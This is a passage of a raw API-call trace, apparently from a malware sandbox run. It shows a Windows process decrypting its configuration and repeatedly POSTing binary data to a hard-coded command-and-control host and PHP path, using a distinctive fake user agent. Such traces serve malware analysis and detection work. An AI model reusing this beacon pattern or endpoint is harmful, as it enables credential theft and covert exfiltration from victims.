(lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0245.195] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0245.195] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0245.195] GetProcessHeap () returned 0x690000 [0245.195] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0245.195] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0245.195] GetProcessHeap () returned 0x690000 [0245.195] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab3d0 [0245.195] socket (af=2, type=1, protocol=6) returned 0x6a0 [0245.195] connect (s=0x6a0, name=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0245.220] FreeAddrInfoW (pAddrInfo=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0245.220] GetProcessHeap () returned 0x690000 [0245.220] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0245.220] GetProcessHeap () returned 0x690000 [0245.220] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b87b8 [0245.221] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0245.222] wvsprintfA (in: param_1=0x6b87b8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0245.222] GetProcessHeap () returned 0x690000 [0245.222] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af440 [0245.222] GetProcessHeap () returned 0x690000 [0245.222] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0245.223] GetProcessHeap () returned 0x690000 [0245.223] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4148 [0245.223] GetProcessHeap () returned 0x690000 [0245.223] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b87b8 [0245.223] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0245.226] wvsprintfA (in: param_1=0x6b87b8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0245.226] GetProcessHeap () returned 0x690000 [0245.226] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0245.226] GetProcessHeap () returned 0x690000 [0245.227] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0245.227] send (s=0x6a0, buf=0x6ad508*, len=242, flags=0) returned 242 [0245.227] send (s=0x6a0, buf=0x6aba40*, len=159, flags=0) returned 159 [0245.227] GetProcessHeap () returned 0x690000 [0245.227] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0245.227] recv (in: s=0x6a0, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0245.320] GetProcessHeap () returned 0x690000 [0245.321] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0245.321] GetProcessHeap () returned 0x690000 [0245.322] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0245.322] GetProcessHeap () returned 0x690000 [0245.322] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af440 | out: hHeap=0x690000) returned 1 [0245.322] GetProcessHeap () returned 0x690000 [0245.323] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0245.323] closesocket (s=0x6a0) returned 0 [0245.323] GetProcessHeap () returned 0x690000 [0245.324] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab3d0 | out: hHeap=0x690000) returned 1 [0245.324] GetProcessHeap () returned 0x690000 [0245.324] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0245.324] GetProcessHeap () returned 0x690000 [0245.325] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0245.325] GetProcessHeap () returned 0x690000 [0245.325] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0245.325] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x9b0) returned 0x6a0 [0245.342] Sleep (dwMilliseconds=0xea60) [0245.351] GetProcessHeap () returned 0x690000 [0245.356] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0245.358] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0245.359] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0245.372] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0245.372] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af100) returned 1 [0245.389] GetProcessHeap () returned 0x690000 [0245.389] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0245.390] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0245.390] CryptImportKey (in: hProv=0x6af100, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0245.391] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0245.392] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0245.392] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0245.393] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0245.393] GetProcessHeap () returned 0x690000 [0245.393] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0245.394] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0245.394] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0245.395] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0245.395] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0245.396] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0245.397] CryptReleaseContext (hProv=0x6af100, dwFlags=0x0) returned 1 [0245.397] GetProcessHeap () returned 0x690000 [0245.397] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0245.397] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0245.398] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0245.398] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0245.400] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0245.401] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0245.402] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0245.402] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0245.403] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0245.403] GetProcessHeap () returned 0x690000 [0245.403] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0245.403] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0245.403] GetProcessHeap () returned 0x690000 [0245.404] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0245.404] GetProcessHeap () returned 0x690000 [0245.404] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0245.404] GetProcessHeap () returned 0x690000 [0245.404] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0245.404] GetProcessHeap () returned 0x690000 [0245.404] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4148 [0245.405] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0245.405] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0245.411] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0245.412] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aee58) returned 1 [0245.418] GetProcessHeap () returned 0x690000 [0245.418] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0245.418] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0245.419] CryptImportKey (in: hProv=0x6aee58, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0245.419] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0245.420] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0245.420] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0245.421] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0245.421] GetProcessHeap () returned 0x690000 [0245.421] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0245.422] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0245.422] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4148, pdwDataLen=0x19fcfc | out: pbData=0x6a4148, pdwDataLen=0x19fcfc) returned 1 [0245.423] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0245.423] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0245.424] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0245.424] CryptReleaseContext (hProv=0x6aee58, dwFlags=0x0) returned 1 [0245.424] GetProcessHeap () returned 0x690000 [0245.424] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0245.425] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0245.425] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0245.425] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0245.426] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0245.426] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0245.426] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0245.427] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0245.427] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0245.427] GetProcessHeap () returned 0x690000 [0245.427] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0245.427] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0245.427] GetProcessHeap () returned 0x690000 [0245.427] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab380 [0245.427] socket (af=2, type=1, protocol=6) returned 0x6a4 [0245.428] connect (s=0x6a4, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0245.452] FreeAddrInfoW (pAddrInfo=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0245.452] GetProcessHeap () returned 0x690000 [0245.452] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6af078 [0245.452] GetProcessHeap () returned 0x690000 [0245.452] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b87b8 [0245.453] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0245.454] wvsprintfA (in: param_1=0x6b87b8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0245.454] GetProcessHeap () returned 0x690000 [0245.454] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af440 [0245.454] GetProcessHeap () returned 0x690000 [0245.454] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0245.454] GetProcessHeap () returned 0x690000 [0245.454] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4340 [0245.454] GetProcessHeap () returned 0x690000 [0245.454] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b87b8 [0245.455] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0245.456] wvsprintfA (in: param_1=0x6b87b8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0245.456] GetProcessHeap () returned 0x690000 [0245.456] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0245.456] GetProcessHeap () returned 0x690000 [0245.456] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0245.456] send (s=0x6a4, buf=0x6ad508*, len=242, flags=0) returned 242 [0245.457] send (s=0x6a4, buf=0x6aba40*, len=159, flags=0) returned 159 [0245.457] GetProcessHeap () returned 0x690000 [0245.457] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0245.457] recv (in: s=0x6a4, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0245.555] GetProcessHeap () returned 0x690000 [0245.556] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0245.556] GetProcessHeap () returned 0x690000 [0245.556] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0245.556] GetProcessHeap () returned 0x690000 [0245.556] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af440 | out: hHeap=0x690000) returned 1 [0245.556] GetProcessHeap () returned 0x690000 [0245.557] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af078 | out: hHeap=0x690000) returned 1 [0245.557] closesocket (s=0x6a4) returned 0 [0245.557] GetProcessHeap () returned 0x690000 [0245.557] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab380 | out: hHeap=0x690000) returned 1 [0245.557] GetProcessHeap () returned 0x690000 [0245.558] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0245.558] GetProcessHeap () returned 0x690000 [0245.558] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0245.558] GetProcessHeap () returned 0x690000 [0245.558] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0245.559] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x3c0) returned 0x6a4 [0245.560] Sleep (dwMilliseconds=0xea60) [0245.561] GetProcessHeap () returned 0x690000 [0245.561] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0245.562] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0245.562] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0245.567] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0245.567] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aef68) returned 1 [0245.572] GetProcessHeap () returned 0x690000 [0245.572] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a30 [0245.573] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0245.573] CryptImportKey (in: hProv=0x6aef68, pbData=0x6a8a30, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0245.573] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0245.574] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0245.574] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0245.575] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0245.575] GetProcessHeap () returned 0x690000 [0245.575] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a30 | out: hHeap=0x690000) returned 1 [0245.576] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0245.577] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0245.578] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0245.578] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0245.579] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0245.579] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0245.579] GetProcessHeap () returned 0x690000 [0245.579] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0245.580] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0245.582] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0245.582] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0245.583] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0245.584] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0245.584] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0245.585] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0245.585] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0245.585] GetProcessHeap () returned 0x690000 [0245.585] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0245.585] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0245.586] GetProcessHeap () returned 0x690000 [0245.586] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0245.586] GetProcessHeap () returned 0x690000 [0245.586] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0245.587] GetProcessHeap () returned 0x690000 [0245.587] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0245.587] GetProcessHeap () returned 0x690000 [0245.587] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4418 [0245.587] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0245.590] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0245.595] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0245.595] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aef68) returned 1 [0245.601] GetProcessHeap () returned 0x690000 [0245.601] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0245.601] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0245.601] CryptImportKey (in: hProv=0x6aef68, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0245.602] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0245.602] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0245.603] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0245.603] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0245.603] GetProcessHeap () returned 0x690000 [0245.604] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0245.604] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0245.605] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4418, pdwDataLen=0x19fcfc | out: pbData=0x6a4418, pdwDataLen=0x19fcfc) returned 1 [0245.605] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0245.606] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0245.606] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0245.607] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0245.607] GetProcessHeap () returned 0x690000 [0245.607] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0245.607] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0245.608] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0245.608] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0245.608] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0245.609] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0245.609] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0245.610] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0245.610] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0245.610] GetProcessHeap () returned 0x690000 [0245.610] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0245.610] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0245.610] GetProcessHeap () returned 0x690000 [0245.610] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab460 [0245.610] socket (af=2, type=1, protocol=6) returned 0x6a8 [0245.611] connect (s=0x6a8, name=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0245.643] FreeAddrInfoW (pAddrInfo=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, 